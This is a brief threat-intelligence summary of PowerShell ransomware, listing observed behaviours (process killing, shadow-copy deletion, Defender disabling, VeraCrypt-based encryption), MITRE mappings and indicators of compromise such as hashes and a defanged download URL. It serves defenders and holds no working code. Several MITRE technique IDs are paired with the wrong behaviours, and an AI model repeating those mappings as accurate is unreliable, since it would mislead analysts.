This article discusses the emergence of PowerShell ransomware, which has shifted from a supporting role to being used for malicious activities, including ransomware attacks. Recent samples demonstrate its capabilities such as file encryption using tools like VeraCrypt, and the combination of AES and RSA encryption schemes. The trend indicates a rise in threat actors utilizing PowerShell for developing more sophisticated malicious code. Affected: Ransomware, Cybersecurity Sector, Victims of ransomware attacks
Keypoints :
- PowerShell is increasingly being used to create ransomware independently.
- The PowerShell ransomware samples exhibit capabilities like stopping processes, deleting shadow copies, and adding registry persistence.
- VeraCrypt is utilized to encrypt victim data by downloading it from a remote address during execution of the PowerShell script.
- Ransomware samples use a combination of RSA and AES encryption algorithms to encrypt data.
- As source code leaks occur, more threat actors are likely to emerge, increasing the use of PowerShell in cybercrime.
MITRE Techniques :
- T1486 – Data Encrypted for Impact: Uses PowerShell to execute VeraCrypt for encrypting files on the victim’s system.
- T1499 – Endpoint Denial of Service: Stops interfering processes to carry out ransomware activities.
- T1560 – Archive Collected Data: Deletes shadow copies to prevent data recovery.
- T1068 – Exploitation of Elevation Control Mechanism: Disables Windows Defender to bypass detection.
- T1203 – Exploitation for Client Execution: Downloads and installs VeraCrypt from a remote location via PowerShell.
Indicator of Compromise :
- [MD5] 982433cb4f485fb6f3cd9fb32cce3bb2
- [MD5] f3b663ef29fd2f8b41cdcf17b4a4300d
- [MD5] 118bd1887d7a1f825826e3a00f06b98e
- [MD5] 4e7fd80028d4d0b227d48da1843762ab
- [URL] https://Launchpad[.]net/veracrypt/trunk/1.25.9/+download/VeraCrypt_Setup_x64_1.25.9[.]msi
Full Story: https://malwareanalysisspace.blogspot.com/2025/03/the-new-face-of-powershell-ransomware.html